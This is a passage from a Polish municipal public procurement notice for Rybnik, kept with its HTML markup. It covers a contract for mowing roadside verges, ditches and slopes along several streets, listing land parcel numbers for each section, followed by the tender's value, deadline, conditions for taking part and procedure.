2474/27, 736/161, 720/161, 734/161, 2476/29, 854/28, 732/166, 1597/167, 1385/113, 1387/116;Boguszowicka_10864/26, 862/26, 746/176, 740/167, 858/27, 742/167, 2475/27, 2477/29, 1598/167;Boguszowicka_11865/26, 864/26, 862/26, 746/176, 740/170, 2258/26, 742/167, 750/176, 753/177, 748/176, 2477/29, 1598/167.Na poszczególnych odcinkach mogą znajdować się następujące elementy infrastruktury drogowej:chodnik, latarnie, znaki, barierki ochronne.Koszenie obejmować ma następujące obszary:pobocza - w miejscach, gdzie znajdują się zabudowania, koszenie do ogrodzenia posesji, w miejscach niezabudowanych - do 2 metrów;pobocza za chodnikami - w miejscach, gdzie znajdują się zabudowania, koszenie do ogrodzenia posesji, w miejscach nie zabudowanych - do 2 metrów za chodnik;pobocza za barierkami ochronnymi;rowy w całości, również za chodnikiem i barierkami ochronnymi (włączając 1 m za rowem);skarpy w całości, również za chodnikiem i barierkami ochronnymi (włączając 1 m na skarpie).6. Ulica Żorska obejmuje odcinek od ronda ,,Boguszowickiego" (skrzyżowanie ulic: Prosta i Boguszowicka) do końca granic miasta w kierunku Żor. Orientacyjna powierzchnia terenu do koszenia - 21 200 m2.Koszenie nie obejmuje wysp rond.Na załączonych mapach ulicę Żorską podzielono na odcinki, do których przyporządkowano numery działek, w obszarze których będzie wykonywane koszenie:Żorska_1617/268;Żorska_2617/268, 2807/305, 2809/305, 2811/305, 2813/305, 2819/305, 1266/19, 1268/20, 1272/26, 2838/324, 1281/34, 1278/34, 1283/34, 2840/343;Żorska_3617/268, 121, 608/66, 796/1, 794/4, 792/5, 610/68, 790/6, 788/9, 799/8, 631/68, 786/31, 784/31, 782/31, 780/31, 778/31, 776/31, 774/31, 772/31. 770/31. 768/31. 765/35;Żorska_4121, 661/68, 659/68, 33, 655/68, 657/68, 766/35, 768/31, 764/34, 758/41, 626/110, 651/68, 762/120, 760/36, 758/41, 756/42, 754/44, 626/110, 628/106, 599/74, 632/75, 122; 57;Żorska_5141/123, 634/94, 636/96, 638/96, 673/124, 746/90, 744/91, 748/88, 802/92, 804/92, 738/102, 645/102, 642/102, 639/102, 808/98, 810/98, 676/98, 640/102, 637/102, 634/102, 631/102, 628/102, 625/102, 633/102, 630/10,; 621/102, 619/106, 615/106, 607/106, 623/102, 618/106;Żorska_6605/106, 608/106, 610/106, 647/133, 649/103, 653/103, 658/103, 396/2, 397/2, 401/2, 405/2, 408/2, 462/2, 413/2, 8/3, 17/3, 658/27, 460/27;Żorska_7460/27, 797, 460/27, 637/133, 265/3, 458/31, 456/31, 454/31, 452/32, 450/34, 448/34, 446/34, 444/37, 442/39, 678/39, 438/41, 436/41, 434/44, 432/46;Żorska_8646/133, 264/3, 647/133, 418/51, 420/51, 648/51, 424/50, 426/50, 428/5, 430/48.Na poszczególnych odcinkach mogą znajdować się następujące elementy infrastruktury drogowej:chodniki, latarnie, barierki ochronne, znaki drogowe.Koszenie obejmować ma następujące obszary:pobocza - w miejscach, gdzie znajdują się zabudowania, koszenie do ogrodzenia posesji, w miejscach niezabudowanych - do 2 metrów;pobocza za chodnikami - w miejscach, gdzie znajdują się zabudowania, koszenie do ogrodzenia posesji, w miejscach nie zabudowanych - do 2 metrów za chodnik;pobocza za barierkami ochronnymi;rowy w całości, również za chodnikiem i barierkami ochronnymi (włączając 1 m za rowem);skarpy w całości, również za chodnikiem i barierkami ochronnymi (włączając 1 m na skarpie);na odcinkach Żorska_6, Żorska_7, Żorska_ 8 koszenie obejmuje tereny za rowem do liniizadrzewienia (strona prawa jadąc od miasta Żory).7. Ulica Wodzisławska obejmuje odcinek od ul. Leśnej do końca granic miasta w kierunku Wodzisławia. Orientacyjna powierzchnia terenów do koszenia - 19 980 m?.Na załączonych mapach ulicę Wodzisławską podzielono na odcinki, do których przyporządkowano numery działek, w obszarze których będzie wykonywane koszenie:Wodzisławska_1346/97, 348/119, 351/113, 357/115, 1151/49, 1245/45, 1243/45, 1241/45, 1235/45, 1231/45, 1228/43, 1159/50, 1226/51, 1224/52;Wodzisławska_2204/60, 202/62, 1175/84, 1200/62, 200/62, 1635/65, 1637/69, 1638/69, 1636/65, 190/69, 1625/56, 858/68, 681/68;Wodzisławska_3500/70, 961/160, 169/2, 957/159, 962/160, 1117/186, 967/185, 1118/183, 5575/184, 4290/176, 4662/180, 973/194, 4664/179, 972/195, 4831/191, 4829/207, 1885/205, 4827/207, 980/205, 1845/218;Wodzisławska_44677/219, 982/219, 986/240, 993/221, 995/222, 2479/204, 1001/204, 997/203, 4816/203, 3830/204, 1009/197;Wodzisławska_54802/4436, 2900/174, 1023/443, 1515/443, 1031/437, 1036/459, 1033/455, 1035/459, 1041/459, 1049/458, 1045/459, 1047/459, 1051/476, 1059/476, 5647/522, 1054/475, 1056/475, 1064/504, 5607/505, 1070/512, 1076/515, 4731/515, 4733/516, 1078/516, 4770/217, 4764/518, 1082/518, 4762/519.Na poszczególnych odcinkach mogą znajdować się następujące elementy infrastruktury drogowej:chodniki, latarnie, znaki drogowe.Koszenie obejmować ma następujące obszary:pobocza - w miejscach, gdzie znajdują się zabudowania, koszenie do ogrodzenia posesji, w miejscach niezabudowanych - do 2 metrów;pobocza za chodnikami - w miejscach, gdzie znajdują się zabudowania, koszenie do ogrodzenia posesji, w miejscach nie zabudowanych - do 2 metrów za chodnik;pobocza za barierkami ochronnymi;rowy w całości, również za chodnikiem i barierkami ochronnymi (włączając 1 m za rowem);skarpy w całości, również za chodnikiem i barierkami ochronnymi (włączając 1 m na skarpie).8. Ulica Prosta obejmuje odcinek rozpoczynający się od ronda ,,Meksyk" (skrzyżowanie ulic: Prosta i Harcerska) do ronda ,,Boguszowickie" (skrzyżowanie ulic: Prosta i Boguszowicka) włączając łącznik pomiędzy ul. Świerklańską i ul. Prostą.Orientacyjna powierzchnia terenów do koszenia - 30 800 m?.Koszenie nie obejmuje znajdujących się na tym odcinku wysp rond.Na załączonych mapach ulicę Prostą podzielono na odcinki, do których przyporządkowano numery działek w obszarze, których będzie wykonywane koszenie poboczy;Prosta_12466/98, 2468/98, 2463/98, 1118/98, 2246/57, 2240/56, 2242/56;Prosta_22238/41; 2235/33; 5623/245; 5620/244; 5618/238Prosta_32992/239, 5615/230, 5611/221, 2993/239, 5615/230, 2222/5, 2224/5, 508/5, 2231/9, 1096/9, 2233/10, 1540/10;Prosta_41539/10, 1542/5, 1545/4, 779/47, 786/44, 783/43, 781/43, 789/40, 792/39, 795/36, 798/35, 801/35, 804/34, 807/33;Prosta_5810/23, 816/25, 819/22, 822/18, 826/15, 830/15, 833/13, 836/4, 1863/10, 1866/18, 1867/17, 1874/30, 1879/35, 1885/42, 1884/42, 1887/42, 1893/45, 846/45, 1896/62, 1899/63, 1901/63, 1904/63, 1908/63, 1914/63, 1910/63;Prosta_62082/96, 2095/112, 2088/118, 2092/125, 2091/125, 2094/133, 2099/140, 2103/153, 2102/156, 2106/169, 2110/178, 2113/184, 2116/188, 2120/195, 2192/219, 2124/219, 2128/219, 2132/219, 2135/54, 2133/215, 2140/254, 2144;254, 2151/255, 2149/255, 2159/267.Na poszczególnych odcinkach mogą znajdować się następujące elementy infrastruktury drogowej:latarnie, barierki ochronne, znaki drogowe, chodniki.Koszenie obejmować ma następujące obszary:pobocza - w miejscach, gdzie znajdują się zabudowania, koszenie do ogrodzenia posesji, w miejscach niezabudowanych - do 2 metrów;pobocza za chodnikami - w miejscach, gdzie znajdują się zabudowania, koszenie do ogrodzenia posesji, w miejscach nie zabudowanych - do 2 metrów za chodnik;pobocza za barierkami ochronnymi;rowy w całości, również za chodnikiem i barierkami ochronnymi (włączając 1 m za rowem);skarpy w całości, również za chodnikiem i barierkami ochronnymi (włączając 1 m na skarpie).9. Ulica Gliwicka obejmuje odcinek rozpoczynający się od skrzyżowania z ulicą Obwiednia Północna do skrzyżowania z ulicą Młynek.Orientacyjna powierzchnia terenów do koszenia - 28 800 m?.Na załączonych mapach ulicę Gliwicką podzielono na odcinki, do których przyporządkowano numery działek, w obszarze których będzie wykonywane koszenie poboczy:Gliwicka_1375/31, 377/28, 373/26, 320/31, 27, 371/25, 326/23, 328/24, 332/24, 334/18, 370/18, 368/19, 366/19, 362/12, 340/9, 342/9, 360/12, 344/9, 346/9, 356/13, 350/10, 352/10, 1499/300, 1569/260, 1635/301, 2256/301, 1501/300, 1505/300, 1507/300, 1511/300, 1509/300, 1513/291; Gliwicka_21509/260, 1633/303, 1631/303, 1513/291, 2206/294, 1628/292, 1625/303, 1623/303, 1619/290, 801/269, 1517/294, 1617/273, 801/269, 1519/269, 1615/267, 1613/267, 1451/269, 1452/270, 1611/261, 1523/262, 1609/262, 1527/71, 1607/262, 1605/262, 1601/122, 1529/73, 1601/122, 1531/59, 1599/118; Gliwicka_31531/59, 1599/118, 1597/75, 1533/74, 1579/75, 1537/50, 1592/75/ 1539/49, 1541/51, 1543/50, 159075, 1545/49, 1547/45, 1569/260, 1588/39, 1549/45, 1551/45, 1553/45, 1586/39, 1584/38, 1561/45, 1580/26, 1563/40, 1565/44, 11, 54/1, 1567/10, 1814/12, 1567/10, 9, 1572/8, 1478/6, 1570/5, 1638/6, 1576/13, 1574/7; Gliwicka_41569/260, 200/40, 1576/13, 702/35, 1275/35, 1276/35, 1274/35, 1277/35, 276/35, 695/18, 699/18, 803/18, 801/8, 797/18, 795/18, 793/18, 791/18, 1689/18, 743/35, 789/18, 787/18, 785/18, 783/18;Gliwicka_5200/40, 747/20, 777/18, 779/18, 775/18, 773/18, 771/18, 769/33, 749/31, 1533/31, 753/29, 1467/29, 767, 765/17, 759/17, 755/21, 761/18, 757/18, 1251/319, 558/108, 603/1;Gliwicka_6603/1, 1255/317, 560/105, 1258/316, 1257/316, 1283/220, 570/91, 1262/315, 1267/313, 1269/311, 576/89, 578/89;Gliwicka_7603/1, 761/315, 582/87, 337/2, 584/87, 586/22, 1273/308, 1275/280, 1277/280, 311/2, 1279/278, 1281/279, 593/9, 595/8, 597/5, 998, 601/5, 599/5;Gliwicka_8998.Na poszczególnych odcinkach mogą znajdować się następujące elementy infrastruktury drogowej:chodniki, latarnie, znaki, barierki ochronne.Koszenie obejmować ma następujące obszary:pobocza - w miejscach, gdzie znajdują się zabudowania, koszenie do ogrodzenia posesji, w miejscach niezabudowanych - do 2 metrów;pobocza za chodnikami - w miejscach, gdzie znajdują się zabudowania, koszenie do ogrodzenia posesji, w miejscach nie zabudowanych - do 2 metrów za chodnik;pobocza za barierkami ochronnymi;rowy w całości, również za chodnikiem i barierkami ochronnymi (włączając 1 m za rowem);skarpy w całości, również za chodnikiem i barierkami ochronnymi (włączając 1 m na skarpie).10. Ulica Rybnicka obejmuje odcinek rozpoczynający się od skrzyżowania z ulicą Młynek do końca granic miasta w kierunku Gliwic.Orientacyjna powierzchnia terenów do koszenia - 24 000 m?.Na załączonych mapach ulicę Rybnicką podzielono na odcinki, do których przyporządkowano numery działek, w obszarze których będzie wykonywane koszenie poboczy:Rybnicka_11015, 1014, 1349, 1013, 1012, 1297;Rybnicka_21015, 1008, 1293, 1282/1, 1282/5, 1282/4, 406, 1007, 1006, 1005, 1041, 1039, 400, 1004, 1037, 1002, 396, 1001, 1031, 1029/1, 1026, 1023, 1024/1;Rybnicka_3578, 575, 577, 576, 858, 855, 832, 214, 574, 824, 823, 574, 658, 657, 572, 1365/4, 654, 1365/3, 570, 579;Rybnicka_4990Na poszczególnych odcinkach mogą znajdować się następujące elementy infrastruktury drogowej:latarnie, znaki, barierki ochronne.Koszenie obejmować ma następujące obszary:pobocza - w miejscach, gdzie znajdują się zabudowania, koszenie do ogrodzenia posesji, w miejscach niezabudowanych - do 2 metrów;pobocza za chodnikami - w miejscach, gdzie znajdują się zabudowania, koszenie do ogrodzenia posesji, w miejscach nie zabudowanych - do 2 metrów za chodnik;pobocza za barierkami ochronnymi;rowy w całości, również za chodnikiem i barierkami ochronnymi (włączając 1 m za rowem);skarpy w całości, również za chodnikiem i barierkami ochronnymi (włączając 1 m na skarpie).UWAGA:Wykonawca winien zapoznać się z terenami, na których ma być wykonana usługa, dokonując wizji lokalnej w terenie bądź zapoznając się z załącznikami mapowymi udostępnionymi na stronie internetowej Zamawiającego i pod adresem: rsip.rybnik.eu.</span> <br/> <br/> <b>II.5) Główny kod CPV: </b> <span id="ctl00_ContentPlaceHolder1_cpv_glowny_przedmiot">77314100-5</span> <br/> <b> Dodatkowe kody CPV:</b> <br/> <br /> <br /> <b> II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>: <br/> Wartość bez VAT: <span id="ctl00_ContentPlaceHolder1_szacunkowa_wartosc_zamowienia_calosc">229213,59</span> <br/> Waluta: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_waluta_calosc">PLN</span> <br/> <i>(w przypadku umów ramowych lub dynamicznego systemu zakupów - szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i> </div> <br/> <b> II.7) Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: </b> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67">Nie</span> <br/> Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67_tekst"></span> <br/> <b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b> <br /> miesiącach:&#160; <span id="ctl00_ContentPlaceHolder1_okres_w_miesiacach"></span> &#160;<i> lub </i> <b> dniach:</b> <span id="ctl00_ContentPlaceHolder1_okres_w_dniach"></span> <br /> <i>lub</i> <br /> <b> data rozpoczęcia: </b> <span id="ctl00_ContentPlaceHolder1_data_rozpoczecia"></span> &#160;<i> lub </i><b> zakończenia: </b> <span id="ctl00_ContentPlaceHolder1_data_zakonczenia">2019-10-31</span> <br /> <br/> <b>II.9) Informacje dodatkowe: </b> <span id="ctl00_ContentPlaceHolder1_informacje_na_temat_katalogow">Termin realizacji zamówienia: 1. Od zawarcia umowy do 31 października 2019 roku, w tym:a) I etap (I koszenie) - rozpoczęcie w terminie wskazanym przez zamawiającego (czas przeznaczony na wykonanie 1 etapu - 14 dni kalendarzowych od rozpoczęcia prac),b) II etap (II koszenie) - rozpoczęcie w terminie wskazanym przez zamawiającego (czas przeznaczony na wykonanie 2 etapu - 14 dni kalendarzowych od rozpoczęcia prac).c) III etap (III koszenie) - rozpoczęcie w terminie wskazanym przez zamawiającego (czas przeznaczony na wykonanie 3 etapu - 14 dni kalendarzowych od rozpoczęcia prac),2. Rozpoczęcie prac do ......... dni roboczych (zgodnie z ofertą) od zgłoszenia (zlecenia) przez Zamawiającego drogą elektroniczną - na podany przez Wykonawcę adres poczty elektronicznej lub dostarczenia bezpośrednio Wykonawcy - w trakcie wykonywania wcześniej zleconej części przedmiotu umowy - zlecenia na wykonanie kolejnej części przedmiotu umowy.</span> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b> III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU </b> <br/> <div style="padding-left: 20px"> <b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_okreslenie_warunkow"></span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_okreslenie_warunkow"></span> <br/> <b>III.1.2) Sytuacja finansowa lub ekonomiczna </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_okreslenie_warunkow"></span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_informacje_dodatkowe"></span> <br/> <b>III.1.3) Zdolność techniczna lub zawodowa </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_okreslenie_warunkow"></span> <br/> Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób: <span id="ctl00_ContentPlaceHolder1_czy_zdolnosc_techniczna_wymaga_wykonawcow"></span> <br/> Informacje dodatkowe: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_informacje_dodatkowe"></span> </div> <b> III.2) PODSTAWY WYKLUCZENIA </b> <br/> <div style="padding-left: 20px"> <b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1 ustawy Pzp</b> <br/> <b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b> <span id="ctl00_ContentPlaceHolder1_czy_zamawiajacy_przewiduje_wykluczenie">Nie</span> Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia: <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_1"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_2"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_3"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_4"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_5"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_6"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_7"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_8"></span> <br/> </div> <b> III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI </b> <br/> <div style="padding-left: 20px"> <b> Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_niepodleganiu_wykluczenia">Tak</span> <br/> <b> Oświadczenie o spełnianiu kryteriów selekcji </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_spelnienie_kryteriow">Nie</span> </div> <b> III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP: </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_dokumentow_zaswiadczen"></span> </div> <b> III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_warunkow_udzialu"></span> <br/> <b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_kryteriow_selekcji"></span> </div> <b> III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_potwierdzenie_okolicznosci"></span> </div> <b> III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6) </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_inne_dokumenty_niewymienione">1. Formularz oferty.2. W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu, składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. Dokumenty te potwierdzają spełnianie warunków udziału w postępowaniu oraz brak podstaw wykluczenia w zakresie, w którym każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu oraz brak podstaw wykluczenia.3. Pełnomocnictwo złożone w formie oryginału lub notarialnie poświadczonej kopii w sytuacji:1) Wykonawców wspólnie ubiegających się o udzielenie zamówienia - pełnomocnictwo do reprezentowania wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia. Pełnomocnik może być ustanowiony do reprezentowania Wykonawców w postępowaniu albo do reprezentowania w postępowaniu i zawarcia umowy.2) podpisania oferty względnie innych dokumentów składanych wraz z ofertą przez osobę, dla której prawo do ich podpisania nie wynika wprost z dokumentu stwierdzającego status prawny Wykonawcy (np. wypisu z Krajowego rejestru sądowego) - pełnomocnictwo do podpisania oferty.4. Wykonawca, w terminie 3 dni od zamieszczenia na stronie internetowej informacji, o której mowa w art. 86 ust. 5, przekazuje Zamawiającemu oświadczenie o przynależności lub braku przynależności do tej samej grupy kapitałowej. Wraz ze złożeniem oświadczenia, Wykonawca może przedstawić dowody, że powiązania z innym wykonawcą nie prowadzą do zakłócenia konkurencji w postępowaniu o udzielenie zamówienia. Zamawiający zamieści informacje, o których mowa w art. 86 ust. 5 ustawy w pliku o nazwie ,,Zbiorcze zestawienie ofert" na swojej stronie internetowej http://bip.zielen.rybnik.pl.</span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA IV: PROCEDURA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>IV.1) OPIS </b> <br/> <b>IV.1.1) Tryb udzielenia zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_tryb_udzielenia_zamowienia">Przetarg nieograniczony</span> <br/> <b>IV.1.2) Zamawiający żąda wniesienia wadium:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wadium">Nie</span> <br/> Informacja na temat wadium <br/> <span id="ctl00_ContentPlaceHolder1_wadium"></span> </div> <br/> <b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zaliczek">Nie</span> <br/> Należy podać informacje na temat udzielania zaliczek: <br/> <span id="ctl00_ContentPlaceHolder1_przewiduje_udzielenie_zaliczek"></span> </div> <br/> <b> IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_zlozenie_katalogow_elektronicznych_informacje_dodatkowe"></span> </div> <br/> <b> IV.1.5.) Wymaga się złożenia oferty wariantowej: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_oferty_wariantowej">Nie</span> <br/> Dopuszcza się złożenie oferty wariantowej <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej">Nie</span> <br/> Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej_zasadniczej">Nie</span> </div> <br/> <b> IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu </b> <br/> <i> (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne) </i> <div style="padding-left: 20px"> Liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_liczba_wykonawcow"></span> <br/> Przewidywana minimalna liczba wykonawców <span id="ctl00_ContentPlaceHolder1_minimalna_liczba_wykonawcow"></span> <br/> Maksymalna liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_wykonawcow"></span> <br/> Kryteria selekcji wykonawców: <br/> <span id="ctl00_ContentPlaceHolder1_znaczenie_warunkow_wykonawcow"></span> </div> <br/> <b> IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów: </b> <div style="padding-left: 20px"> Umowa ramowa będzie zawarta: <br/> <span id="ctl00_ContentPlaceHolder1_z_kim_umowa_bedzie_zawarta"></span> <br/> Czy przewiduje się ograniczenie liczby uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_ograniczenie_liczby_uczestnikow">Nie</span> <br/> Przewidziana maksymalna liczba uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow_informacje_dodatkowe"></span> <br/> Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_obejmuje_ustanowienie"></span> <br/> Adres strony internetowej, na której będą zamieszczone dodatkowe informacje dotyczące dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie_informacje_dodatkowe"></span> <br/> W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_umowy_ramowej_dynamicznego_katalogow"></span> <br/> Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_pobranie_umowy_ramowej_dynamicznego_katalogow">Nie</span> </div> <br/> <b>IV.1.8) Aukcja elektroniczna </b> <br/> <b> Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i> <span id="ctl00_ContentPlaceHolder1_aukcja_elektroniczna">Nie</span> <br/> Należy podać adres strony internetowej, na której aukcja będzie prowadzona: <br/> <span id="ctl00_ContentPlaceHolder1_adres_strony_na_ktorej_bedzie_prowadzona"></span> <br/> <b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b> <span id="ctl00_ContentPlaceHolder1_elementy_aukcji_elektronicznej"></span> <br/> <b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b> <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenia_do_przedstawianych_wartosci"></span> <br/> Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie termin ich udostępnienia: <span id="ctl00_ContentPlaceHolder1_informaje_udostepnione_wykonawcom"></span> <br/> Informacje dotyczące przebiegu aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_informaje_przebiegu_aukcji"></span> <br/> Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): <span id="ctl00_ContentPlaceHolder1_warunki_do_licytacji"></span> <br/> Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń: <span id="ctl00_ContentPlaceHolder1_wykorzystanie_sprzetu_elektronicznego"></span> <br/> Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_wymagania_dotyczace_rejestracji_wyk_aukcja"></span> <br/> Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa"></span> <br/>Czas trwania: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa_czas"></span> <br /> <br/> Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_wykonawcy_zakwalfikowani"></span> <br/> Warunki zamknięcia aukcji elektronicznej: <br/> <span id="ctl00_ContentPlaceHolder1_warunki_zamkniecia_aukcji"></span> </div> <br/> <b>IV.2) KRYTERIA OCENY OFERT </b> <br/> <b>IV.2.1) Kryteria oceny ofert: </b> <br/> <b>IV.2.2) Kryteria</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kryteria</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Znaczenie</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>cena</TD><TD 